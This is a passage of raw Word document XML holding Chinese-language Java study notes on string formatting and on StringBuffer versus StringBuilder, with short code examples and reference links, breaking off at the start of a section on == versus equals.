      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                   "%f, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>整型变量的值为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> " +</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F73B2D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                   " %d, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>字符串变量的值为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> " +</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A5DEBA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                   " %s", floatVar, intVar, stringVar);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435E53F2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C7449B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>: https://www.runoob.com/manual/jdk11api/java.base/java/lang/String.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9FB20B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="739" w:name="_Toc159780168"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>StringBuffer</w:t>
      </w:r>
      <w:bookmarkEnd w:id="739"/>
    </w:p>
    <w:p w14:paraId="787E31A0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当对字符串进行修改的时候，需要使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> StringBuffer </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> StringBuilder </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C42BAF7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="470B68AD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> String </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>类不同的是，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">StringBuffer </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> StringBuilder </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>类的对象能够被多次的修改，并且不产生新的未使用对象。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BBB919D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="20D83D49" wp14:editId="22B3CA4D">
            <wp:extent cx="3758565" cy="2066925"/>
            <wp:effectExtent l="0" t="0" r="5715" b="5715"/>
            <wp:docPr id="3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descr="IMG_256"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId250"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3758565" cy="2066925"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="05CDE292" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> StringBuffer </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类时，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>每次都会对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> StringBuffer </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>对象本身进行操作，而不是生成新的对象，所以如果需要对字符串进行修改推荐使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> StringBuffer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4679A6CC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4400BCF2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">StringBuilder </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Java 5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中被提出，它和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> StringBuffer </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之间的最大不同在于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> StringBuilder </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的方法不是线程安全的（不能同步访问）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5D6BC6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79FC7F4A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>由于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> StringBuilder </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>相较于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> StringBuffer </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>有速度优势，所以多数情况下建议使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> StringBuilder </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>类</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66AC3D88" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78C169C9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>public class RunoobTest{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F044CFD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    public static void main(String args[]){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="530A613F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        StringBuilder sb = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>new StringBuilder(10);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="504197D6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>sb.append("Runoob..");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6AC06F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        System.out.println(sb);  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D655E68" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        sb.append("!");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E38DD3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        System.out.println(sb); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C4D3E2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>sb.insert(8, "Java");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1201653D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        System.out.println(sb); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A958A5C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>sb.delete(5,8);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E9C3EA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        System.out.println(sb);  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="640DAF56" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0C7372" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B5CA43" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>在应用程序要求线程安全的情况下，则必须使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> StringBuffer </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>类。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D1D2AE8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>public class Test{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7303D374" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  public static void main(String args[]){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D40CC9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    StringBuffer sBuffer = new StringBuffer("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>菜鸟教程官网：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05FB80C5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    sBuffer.append("www");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C87C1E3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    sBuffer.append(".runoob");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F25DD69" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    sBuffer.append(".com");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AABC49D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    System.out.println(sBuffer);  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA268BD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43991338" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62832F39" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">StringBuffer </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB77C6A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>StringBuffer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="632CDF20" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>https://www.runoob.com/manual/jdk11api/java.base/java/lang/StringBuffer.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B78A8B0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>StringBuilder</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EEC4E83" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>https://www.runoob.com/manual/jdk11api/java.base/java/lang/StringBuilder.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8CEAFA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="740" w:name="_Toc159780169"/>
      <w:bookmarkStart w:id="741" w:name="OLE_LINK36"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不常见写法</w:t>
      </w:r>
      <w:bookmarkEnd w:id="740"/>
    </w:p>
    <w:p w14:paraId="0B1F6E89" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="742" w:name="_Toc159780170"/>
      <w:bookmarkEnd w:id="741"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">== </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> equals </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的区别是什么？引用类型和值的比较是不一样的</w:t>
      </w:r>
      <w:bookmarkEnd w:id="742"/>
    </w:p>
    <w:p w14:paraId="4FE03F08" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68DEF7C3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>https://cloud.tencent.com/developer/article/2016113</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD3D638" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75CE0F23" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>基本类型的变量</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来说（如</w:t>
      </w:r>
      <w:r>
